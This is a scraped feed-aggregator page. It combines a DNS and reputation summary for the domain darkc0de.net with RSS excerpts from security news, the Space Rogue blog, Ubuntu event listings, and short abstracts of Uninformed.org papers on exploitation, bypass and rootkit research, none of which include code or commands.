http://www.robtex.com/dns/darkc0de.net.rss Summary --- Darkc0de.com and darkc0de.org are similar domain names. Also check www.darkc0de.net. It has six inlinks. Trustworthiness, vendor reliability and privacy of this site is very poor. (more on reputation).It is blacklisted in one list. Search for darkc0de.net. Domain Name Reputation: Source Result WOT Trustworthiness, vendor reliability and privacy of this site is very poor BLACKLIST LISTED IN BLACKLIST! multi.surbl.org Result -- The following pages contain combined information gathered by searching several sources. Navigate between the pages by clicking on the tabs above. Source Date Information Oct 20, 2012 1:02:25 PM Visible DNS Information rbls.org Oct 20, 2012 1:02:20 PM Blacklistings Alexa Oct 18, 2012 1:02:16 PM Description, ranking and other stats WOT Oct 18, 2012 1:02:16 PM Reputation Oct 8, 2012 3:44:11 AM Whois information Total score 0/50 normalized to 1 out of 5 based on 5 tests 1/5 Check Result NS on different IP networks NO NS delegation consistent with zone NO Listed in DMOZ NO Listed in Alexa top 100000 NO Good WOT rating NO Indexed in Google - - More pages on the Internet describing the domain: Google Safe Browsing | McAfee SiteAdvisor | Norton Safe Web | AVG | Web of Trust | rbls.org Alexa | DNS Tree | Whois info | Domain Info API | More... DNS Records ------- Base Record Pref Name IP-number Reverse Route Autonomous System net ns b.gtld-servers.net 2001:503:231d::2:30 (none) ? 192.33.14.30 192.33.14.0/24VeriSign Route AS26415 VERISIGN-AS VeriSign, Inc g.gtld-servers.net 192.42.93.30 192.42.93.0/24VeriSign Route AS36624 VERISIGN-AS VeriSign, Inc h.gtld-servers.net 192.54.112.30 192.54.112.0/24VeriSign Route AS36623 VERISIGN-AS VeriSign, Inc a.gtld-servers.net 2001:503:a83e::2:30 ? 192.5.6.30 192.5.6.0/24VeriSign Route AS36621 VERISIGN-AS VeriSign, Inc k.gtld-servers.net 192.52.178.30 192.52.178.0/24VeriSign Route AS36622 VERISIGN-AS VeriSign, Inc d.gtld-servers.net 192.31.80.30 192.31.80.0/24VeriSign Route AS36617 VERISIGN-AS VeriSign, Inc j.gtld-servers.net 192.48.79.30 192.48.79.0/24VeriSign Route AS36626 VERISIGN-AS VeriSign, Inc e.gtld-servers.net 192.12.94.30 192.12.94.0/24VeriSign Route AS36618 VERISIGN-AS VeriSign, Inc l.gtld-servers.net 192.41.162.30 192.41.162.0/24VeriSign Route AS36628 VERISIGN-AS VeriSign, Inc f.gtld-servers.net 192.35.51.30 192.35.51.0/24VeriSign Route AS36620 VERISIGN-AS VeriSign, Inc i.gtld-servers.net 192.43.172.30 192.43.172.0/24VeriSign Route AS36632 VERISIGN-AS VeriSign, Inc c.gtld-servers.net 192.26.92.30 192.26.92.0/24VeriSign Route AS36619 VERISIGN-AS VeriSign, Inc m.gtld-servers.net 192.55.83.30 192.55.83.0/24VeriSign Route AS36630 VERISIGN-AS VeriSign, Inc gtld-servers.net Graph - darkc0de.net Shared -- Shared info is fetched in the background

==> Caribbean Bookstore Owner Protects Business and Residence with MobileCamViewer

http://www.securitypark.co.uk/rss/rss_main.asp The Caribbean life has its perks, but business owners and residents deal with the same property-related security concerns as most populated countries. Therefore, it's no surprise that mobile surveillance is catching on across more Caribbean nations as service providers upgrade from 2G to 3G technology. Elston Lewis, owner of Family Bookstore on the island of St. Maarten, launched his mobile su ...[more]

==> ForeScout CounterACT 7 Extends Best-In-Class NAC to Accelerate BYOD Results

http://www.securitypark.co.uk/rss/rss_main.asp ForeScout Technologies, Inc., a leading provider of automated security control solutions for Global 1000 enterprises and government organisations, today recast the network access control (NAC) landscape with the release of ForeScout CounterACT 7 delivering hybrid 802.1X and agentless NAC functionality that makes it easier to deploy, manage and scale network access control, particularly for organ ...[more]

==> Zscaler's ThreatLabZ launches free mobile app profiler to help users assess their risk

http://www.securitypark.co.uk/rss/rss_main.asp Zscaler, the leader in secure cloud gateway solutions, announced today the results of an analysis from ThreatLabZ, the company's security research arm, which reveals that up to 10 percent of mobile apps expose user passwords and login names, 25 percent expose personally identifiable information and 40 percent communicate with third parties. The analysis was done using the new Zscaler Application P ...[more]

==> School Attendance System with Nephsystem 2.45GHz Active RFID

http://www.securitypark.co.uk/rss/rss_main.asp RFID technology has been applied in attendance system in the recent year. However, there are still some limitations such as the information visualization of RFID tag and short reading coverage. Our least active RFID product NSAR-800 active RFID reader and Tag will help to optimize the school attendance system. The Operation of the system RFID School attendance system saves manual paper admini ...[more]

==> NFC Manned Guarding Solutions have arrived

http://www.securitypark.co.uk/rss/rss_main.asp Reslink Solutions are a firm of NFC (near field Communications) specialists who have been providing real-time security guard touring solutions for many companies including G4S and Securitas. Using the latest NFC embedded mobile devices managers are able to view the exact patrol route that their operatives have taken whilst on tour. All route data is accessible in real-time via a secure web portal. ...[more]

==> New Business Models & Disruptive Technologies Shift Security from a Cost Centre to a Cash Generator

http://www.securitypark.co.uk/rss/rss_main.asp The total value of the world's security equipment market at factory gate prices in 2012 was $20.57bn. Of this Video Surveillance products at $10bn took a share of 49%. The value of M&A deals in 2012 declined to $7.168 billion a fall of 27%. Poor economic trading conditions reduced the confidence of major suppliers to go for growth through M&A. Although we don't expect this to continue and forec ...[more]

==> NFC Wristbands Gives People More Optimistic Payment Life by NFC Technology

http://www.securitypark.co.uk/rss/rss_main.asp With the introduction of NFC technology, the identification information flows faster than it ever did by NFC wristband at World-Cup, Music Party and events. And as the big wave of NFC wristbands has been lifted in the market, DAILY RFID released latest NFC Wristband-01 to make people to possess the more optimistic payment life. Going to the Concert or Festival Party with the NFC wristbands will le ...[more]

==> NFC Card Allows People to Enjoy the Pleasant Payment with NFC-enable Smartphone

http://www.securitypark.co.uk/rss/rss_main.asp Since the advanced NFC technology has made its way into the business card nowadays, gone are the long queues due to waiting for credit card transactions to go through. And as one of the most professional RFID manufacturers in China, DAILY RFID has released latest RFID NFC card-02 for NFC-enable Smartphone, like iPhone and Android, to accelerate the payment process. Compliant with ISO 14443 standar ...[more]

==> ValidSoft says NatWest Get Cash App problem is easily solved

http://www.securitypark.co.uk/rss/rss_main.asp "NatWest's decision to suspend its Get Cash App was a wise one, and what this incident highlights is the fact that security is an increasingly important part of any bank's customer service. "The security loophole with the Get Cash App would appear to be a very basic one and similar to attacks on online accounts that use PINs and passwords. In order to use the App, one needs to be registered fo ...[more]

==> Brocade Fabric Switches to provide networking support for new Hitachi Unified Compute Platform

http://www.securitypark.co.uk/rss/rss_main.asp Brocade (Nasdaq: BRCD) announced that several of its Ethernet and storage area networking (SAN) fabric switches have been integrated by Hitachi Data Systems for networking technology in the new Hitachi Unified Compute Platform (UCP) converged infrastructure solutions, which were announced today. Brocade is delivering both top-of-rack switches as well as embedded server switches based on Fibre Chan ...[more]

==> Book Review: This Machine Kills Secrets

http://www.spacerogue.net/wordpress/?feed=rss2 Book Review: This Machine Kills Secrets By: Andy Greenberg Penguin Group 2012 ISBN 978-1-101-59358-5 *Page references have been taken from the electronic iPad version Ill admit I havent finished the whole book yet but the way the book portrays some events I was involved in differs from my own memory. I wanted to highlight those [...]

==> Hackers and Media Hype or Big Hacks That Never Really Happened

http://www.spacerogue.net/wordpress/?feed=rss2 I have been giving my talk “Hackers and Media Hype or Big Hacks That Never Really Happened” for a few months now and I think it is time to retire it. You may have seen it at Shmoocon Epilogue, Source Boston or Hope 9. If not catch the video below. I also have the entire [...]

==> Emails From Michael In Iran

http://www.spacerogue.net/wordpress/?feed=rss2 If publishing unsourced emails claiming to be from Iran is a newsworthy event then I guess we should all copy Mikko and do the same thing. A few years ago I received a chain of emails from ‘Michael’ that started out as the normal ‘teach me to hack’ emails I receive on an almost daily [...]

==> L0pht Hacker Space Visa

http://www.spacerogue.net/wordpress/?feed=rss2 The L0pht was not the first hacker space, in fact at the time of its creation in Boston there were at least two other such spaces, Sinister House and Messiah Village, which later moved and became New Hack City, or simply New Hack. L0pht wasnt even the cause of the recent explosion of hacker spaces [...]

==> FUD can Sometimes be Useful

http://www.spacerogue.net/wordpress/?feed=rss2 There has been a story making the rounds the last few weeks that is really bugging me. I was going to let it slide but the story just wont die and every time it comes around again I just get angrier. The problem is I dont think the story is actually true, which wouldnt be [...]

==> Handle Shmandle

http://www.spacerogue.net/wordpress/?feed=rss2 A lot of people ask me why I still use a handle and go by ‘Space Rogue’ instead of using my real name. Trust me it is kinda awkward to go to a respectable con like BSides, Blackhat or even RSA and introduce myself as ‘Space Rogue’. People always ask me to repeat myself as [...]

==> bleep the SCADA is Falling!!!

http://www.spacerogue.net/wordpress/?feed=rss2 Let me say first that SCADA (supervisory control and data acquisition) attacks are real, they do happen and should be a real concern. But if we look at the recent press surrounding such attacks we see little in the way of any hard evidence that such an attack actually occurred. Instead we see rumor and [...]

==> NASA Confirms but China Denies Satellite ‘hacking’

http://www.spacerogue.net/wordpress/?feed=rss2 Since I posted my previous item regarding my suspicions as to the validity of the claims of ‘interference’ with a US Government satellite there have a few more developments. First NASA has come out and ‘confirmed’ the interference. According to NASA PAO: “NASA experienced two suspicious events with the Terra spacecraft in the summer and [...]

==> Rebuttal – “Hackers reportedly behind U.S. government satellite disruptions”

http://www.spacerogue.net/wordpress/?feed=rss2 First some historical background, this is at least the third time I have seen a similar story over the last 15 years. “bleep ‘hackers’ can control a satellite”, the previous two times it turned out to be false. The first time I was one of the first people call the story suspect. It is hard [...]

==> We would like your feedback

http://www.spacerogue.net/wordpress/?feed=rss2 Getting your customers to fill out market satisfaction survey’s is all the rage these days. “We greatly appreciate your feedback ” Hey, its free demographic marketing! Its also usually ego stroking, studies show that people tend to skew their own responces to the positive side of things. Generally I don’t fill these things out at [...]

==> The Open Cloud Webinars: Stability, support and the latest cloud features: using the Ubuntu Cloud Archive

http://www.ubuntu.com/rss.xml The pace of innovation in the cloud is ferocious. And theres no better example than OpenStack - the fastest growing open source project ever, according to some reports. Join Ubuntu Server Engineering Manager Dave Walker, to learn how the Ubuntu Cloud Archive provides access to the very latest OpenStack features on long-term support releases of Ubuntu. The webinar will cover the principles behind the Ubuntu Cloud Archive and its use in the enterprise, enabling you and your organisation to make the most of the open cloud. Location: Online Time: Wed, 2012-11-07 16:00

==> The Open Cloud Webinars: Running OpenStack Folsom on Ubuntu 12.10 and Ubuntu 12.04 LTS

http://www.ubuntu.com/rss.xml The second webinar of our Ubuntu 12.10 series focuses on Folsom, the latest release of OpenStack. In this webinar, Ubuntu Server Engineering Manager Dave Walker will talk you through the process of deploying Folsom on Ubuntu 12.10 and 12.04 LTS, showcasing some of the unique deployment tools that make Ubuntu the fastest route to a fully-operative, enterprise-grade OpenStack cloud. Join us, learn more and ask questions live! Location: Online Time: Wed, 2012-10-31 17:00

==> The Open Cloud Webinars: New features in Ubuntu 12.10, the world’s most cloud-friendly OS

http://www.ubuntu.com/rss.xml Another 6 months has passed so it's time for next Ubuntu release! Join Mark Baker, Ubuntu Server Product Manager to find out about the new features in Ubuntu 12.10 and how you can take advantage of them. Whether you are new to Ubuntu or using it already this webinar will give you an insight into 12.10 for both server and cloud computing. Register today and ask questions live! Location: Online Time: Tue, 2012-10-23 16:00

==> Ubuntu Enterprise Summit

http://www.ubuntu.com/rss.xml The Ubuntu Enterprise Summit is a one-day conference aimed at technologists and IT decision-makers.At this years event, analysts and technologists will join key figures from Canonical, to discuss the new best practice and the road ahead for enterprise IT.For more information and to view the agenda, visit:http://uds.ubuntu.com/enterprise-summit/ Location: Copenhagen, Denmark Time: Tue, 2012-10-30 (All day)

==> Ubuntu Developer Summit

http://www.ubuntu.com/rss.xml Come and join us for yet another fantastic, action-packed Ubuntu Developer Summit!This time, we're in Europe at the Bella Centre in Copenhagen. Registration is free and spaces are limted so hurry!The Ubuntu Developer Summit is the event where we plan for the forthcoming version of Ubuntu. It brings together Canonical engineers, community members, partners, upstreamrepresentatives and cloud specialists, in an environment of active debate.For more information, visit:http://uds.ubuntu.com Location: Copenhagen, Denmark Time: Mon, 2012-10-29 (All day) - Thu, 2012-11-01 (All day)

==> DroidCon

http://www.ubuntu.com/rss.xml Canonical is a Partner Sponsor at the upcoming DroidCon event. Location: London, UK Time: Thu, 2012-10-25 (All day) - Fri, 2012-10-26 (All day)

==> Mass TLC: Cloud Summit

http://www.ubuntu.com/rss.xml Canonical will have a presence at Mass TLC's upcoming Cloud Summit.If you're in the area, stop by and say hello! Location: Boston, USA Time: Fri, 2012-10-19 (All day)

==> The OpenStack Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be one of the premier sponsors of the OpenStack Summit.Ubuntu Founder, Mark Shuttleworth, will be presenting a keynote session and the Canonical team will be there, so stop by our booth and say hello!Canonical was the first company to commercially distribute and support OpenStack - and Ubuntu has remained the reference operating system for the OpenStack project since the beginning. We include it in every download and CD of Ubuntu Server, which gives us a huge interest in its continuing development.Canonical is also one of eight members of the OpenStack Foundation. Location: San Diego, USA Time: Mon, 2012-10-15 (All day) - Thu, 2012-10-18 (All day)

==> Zentyal Summit

http://www.ubuntu.com/rss.xml Canonical is proud to be a Premier Sponsor for the upcoming Zentyal Summit.Zentyal is an official Ubuntu Advantage Reseller.For more information, visit:http://events.zentyal.com/2012/10/04/zentyal-summit-2012-2/ Location: Zaragosa, Spain Time: Thu, 2012-10-04 (All day)

==> New Landscape Features and Functionality

http://www.ubuntu.com/rss.xml Landscape is the Ubuntu systems management tool, proven to save time and money when managing Ubuntu deployments at scale. Join this webinar to learn about new features including role-based access control, bare-metal provisioning and its full API, alongside reporting capabilities and other tools to give you total operational awareness. Youll gain a comprehensive insight into how Landscapes enterprise systems management and regulatory compliance functionality can help an organisation tame complexity. Location: Webinar Time: Thu, 2012-09-20 16:00

==> Using dual-mappings to evade automated unpackers

http://www.uninformed.org/uninformed.rss Automated unpackers such as Renovo, Saffron, and Pandora's Bochs attempt to dynamically unpack executables by detecting the execution of code from regions of virtual memory that have been written to. While this is an elegant method of detecting dynamic code execution, it is possible to evade these unpackers by dual-mapping physical pages to two distinct virtual address regions where one region is used as an editable mapping and the second region is used as an executable mapping. In this way, the editable mapping is written to during the unpacking process and the executable mapping is used to execute the unpacked code dynamically. This effectively evades automated unpackers which rely on detecting the execution of code from virtual addresses that have been written to.

==> Analyzing local privilege escalations in win32k

http://www.uninformed.org/uninformed.rss This paper analyzes three vulnerabilities that were found in win32k.sys that allow kernel-mode code execution. The win32k.sys driver is a major component of the GUI subsystem in the Windows operating system. These vulnerabilities have been reported by the author and patched in MS08-025. The first vulnerability is a kernel pool overflow with an old communication mechanism called the Dynamic Data Exchange (DDE) protocol. The second vulnerability involves improper use of the ProbeForWrite function within string management functions. The third vulnerability concerns how win32k handles system menu functions. Their discovery and exploitation are covered.

==> Exploiting Tomorrow's Internet Today: Penetration testing with IPv6

http://www.uninformed.org/uninformed.rss This paper illustrates how IPv6-enabled systems with link-local and auto-configured addresses can be compromised using existing security tools. While most of the techniques described can apply to "real" IPv6 networks, the focus of this paper is to target IPv6-enabled systems on the local network.

==> Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS

http://www.uninformed.org/uninformed.rss In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.

==> An Objective Analysis of the Lockdown Protection System for Battle.net

http://www.uninformed.org/uninformed.rss Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.

==> ActiveX - Active Exploitation

http://www.uninformed.org/uninformed.rss This paper provides a general introduction to the topic of understanding software vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.

==> Context-keyed Payload Encoding

http://www.uninformed.org/uninformed.rss A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.

==> Improving Software Security Analysis using Exploitation Properties

http://www.uninformed.org/uninformed.rss Reliable exploitation of security vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.

==> Real-time Steganography with RTP

http://www.uninformed.org/uninformed.rss Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.

==> OS X Kernel-mode Exploitation in a Weekend

http://www.uninformed.org/uninformed.rss Apple's Mac OS X operating system is attracting more attention from users and security researchers alike. Despite this increased interest, there is still an apparent lack of detailed vulnerability development information for OS X. This paper will attempt to help bridge this gap by walking through the entire vulnerability development process. This process starts with vulnerability discovery and ultimately finished with a remote code execution. To help illustrate this process, a real vulnerability found in the OS X wireless device driver is used.

==> A Catalog of Local Windows Kernel-mode Backdoor Techniques

http://www.uninformed.org/uninformed.rss This paper presents a detailed catalog of techniques that can be used to create local kernel-mode backdoors on Windows. These techniques include function trampolines, descriptor table hooks, model-specific register hooks, page table modifications, as well as others that have not previously been described. The majority of these techniques have been publicly known far in advance of this paper. However, at the time of this writing, there appears to be no detailed single point of reference for many of them. The intention of this paper is to provide a solid understanding on the subject of local kernel-mode backdoors. This understanding is necessary in order to encourage the thoughtful discussion of potential countermeasures and perceived advancements. In the vein of countermeasures, some additional thoughts are given to the common misconception that PatchGuard, in its current design, can be used to prevent kernel-mode rootkits.

==> Generalizing Data Flow Information

http://www.uninformed.org/uninformed.rss Generalizing information is a common method of reducing the quantity of data that must be considered during analysis. This fact has been plainly illustrated in relation to static data flow analysis where previous research has described algorithms that can be used to generalize data flow information. These generalizations have helped support more optimal data flow analysis in certain situations. In the same vein, this paper describes a process that can be employed to generalize and persist data flow information along multiple generalization tiers. Each generalization tier is meant to describe the data flow behaviors of a conceptual software element such as an instruction, a basic block, a procedure, a data type, and so on. This process makes use of algorithms described in previous literature to support the generalization of data flow information. To illustrate the usefulness of the generalization process, this paper also presents an algorithm that can be used to determine reachability at each generalization tier. The algorithm determines reachability starting from the least specific generalization tier and uses the set of reachable paths found to progressively qualify data flow information for each successive generalization tier. This helps to constrain the amount of data flow information that must be considered to a minimal subset.

==> Reducing the Effective Entropy of GS Cookies

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.

==> Memalyze: Dynamic Analysis of Memory Access Behavior in Software

http://www.uninformed.org/uninformed.rss This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.

==> Mnemonic Password Formulas

http://www.uninformed.org/uninformed.rss The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recalls termed Mnemonic Password Formulas.

==> Locreate: An Anagram for Relocate

http://www.uninformed.org/uninformed.rss This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation.

==> Exploiting 802.11 Wireless Driver Vulnerabilities on Windows

http://www.uninformed.org/uninformed.rss This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation.

==> Implementing a Custom X86 Encoder

http://www.uninformed.org/uninformed.rss This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder.

==> Preventing the Exploitation of SEH Overwrites

http://www.uninformed.org/uninformed.rss This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation.

==> Effective Bug Discovery

http://www.uninformed.org/uninformed.rss Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations

==> Wars Within

http://www.uninformed.org/uninformed.rss In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play.

==> Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field

http://www.uninformed.org/uninformed.rss The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using.

==> Improving Automated Analysis of Windows x64 Binaries

http://www.uninformed.org/uninformed.rss As Windows x64 becomes a more prominent platform, it will become necessary to develop techniques that improve the binary analysis process. In particular, automated techniques that can ...

==> Exploiting the Otherwise Non-Exploitable on Windows

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be applied in certain situations to gain arbitrary code execution through software bugs that would not otherwise be exploitable, such ...

==> Abusing Mach on Mac OS X

http://www.uninformed.org/uninformed.rss This paper discusses the security implications of Mach being integrated with the Mac OS X kernel. A few examples are used to illustrate how Mach support can be used to bypass some of the BSD security features, ...

==> GREPEXEC: Grepping Executive Objects from Pool Memory

http://www.uninformed.org/uninformed.rss As rootkits continue to evolve and become more advanced, methods that can be used to detect hidden objects must also evolve. For example, relying on system provided APIs to ...

==> Anti-Virus Software Gone Wrong

http://www.uninformed.org/uninformed.rss Anti-virus software is becoming more and more prevalent on end-user computers today. Many major computer vendors (such as Dell) bundle anti-virus software and other personal security suites in the default ...

==> Bypassing PatchGuard on Windows x64

http://www.uninformed.org/uninformed.rss The version of the Windows kernel that runs on the x64 platform has introduced a new feature, nicknamed PatchGuard, that is intended to prevent both malicious software and third-party vendors ...

==> Windows Kernel-mode Payload Fundamentals

http://www.uninformed.org/uninformed.rss This paper discusses the theoretical and practical implementations of kernel-mode payloads on Windows. At the time of this writing, kernel-mode research is generally regarded as the ...

==> Analyzing Common Binary Parser Mistakes

http://www.uninformed.org/uninformed.rss With just about one file format bug being consistently released on a weekly basis over the past six to twelve months, one can only hope developers would look and learn. The reality of it ...

==> Attacking NTLM with Precomputed Hashtables

http://www.uninformed.org/uninformed.rss Breaking encrypted passwords has been of interest to hackers for a long time, and protecting them has always been one of the biggest security problems operating systems have faced, with ...

==> Linux Improvised Userland Schedular Virus

http://www.uninformed.org/uninformed.rss This paper discusses the combination of a userland scheduler and runtime process infection for a virus. These two concepts complete each other. The runtime process infection opens the door to ...

==> FUTo

http://www.uninformed.org/uninformed.rss Since the introduction of FU, the rootkit world has moved away from implementing system hooks to hide their presence. Because of this change in offense, a new defense had to be developed. The new algorithms ...

==> Thick Clients Gone Wrong

http://www.uninformed.org/uninformed.rss When designing thick-client based solutions,developers often suffer from the incorrect assumption that end-users are incapable of modifying, examining, or emulating the packaged client. Throughout this document, ...

==> Inside Blizzard: Battle.net

http://www.uninformed.org/uninformed.rss This paper intends to describe a variety of the problems Blizzard Entertainment has encountered from a practical standpoint through their implementation of the large-scale online game matchmaking and chat ...

==> Temporal Return Addresses

http://www.uninformed.org/uninformed.rss Nearly all existing exploitation vectors depend on some knowledge of a process' address space prior to an attack in order to gain meaningful control of execution flow. In cases where this is necessary, exploit ...

==> Bypassing Windows Hardware-enforced DEP

http://www.uninformed.org/uninformed.rss This paper describes a technique that can be used to bypass Windows hardware-enforced Data Execution Prevention (DEP) on default installations of Windows XP Service Pack 2 and Windows 2003 Server Service Pack 1. This technique makes it possible to execute ...

==> 802.11 VLANs and Association Redirection

http://www.uninformed.org/uninformed.rss The goal of this paper is to introduce the reader to a technique that could be used to implement something analogous to VLANs found in wired media into a typical IEEE 802.11 environment. ...

==> Introduction to Reverse Engineering Win32 Applications

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of ...

==> Post-Exploitation on Windows using ActiveX Controls

http://www.uninformed.org/uninformed.rss When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound ...

==> Smart Parking Meters

http://www.uninformed.org/uninformed.rss Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper ...

==> Loop Detection

http://www.uninformed.org/uninformed.rss During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and ...

==> Social Zombies: Aspects of Trojan Networks

http://www.uninformed.org/uninformed.rss Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft ...

==> Mac OS X PPC Shellcode Tricks

http://www.uninformed.org/uninformed.rss Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction ...

==> Annoyances Caused by Unsafe Assumptions

http://www.uninformed.org/uninformed.rss This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases ...

==> Chasing Shadows in the IT Supply Chain

http://www.veracode.com/blog/?feed=rss2 Has our security been compromised before the shrink wrap is even off the box? The U.S. House of Representatives went on record this month with a warning to U.S. industry of the danger of compromised supply chains. But getting to the bottom of the supply chain threat will require more than just tough talk.

==> Patching Up the Patch Process

http://www.veracode.com/blog/?feed=rss2 Travis Emmert of Veracode is credited in the latest Oracle Critical Patch update for reporting nine Web application vulnerabilities in Oracle Fusion Middleware, Imaging and Process Management. After talking to Travis about how he found the vulnerabilities, what he found, and Oracles advisory release process I thought this material would make for a good blog post. I asked Travis to take a few moments to write about this experience.

==> Obama vs Romney on Cybersecurity: You Decide Infographic

http://www.veracode.com/blog/?feed=rss2

==> Never Attribute to Malice, but Always Verify

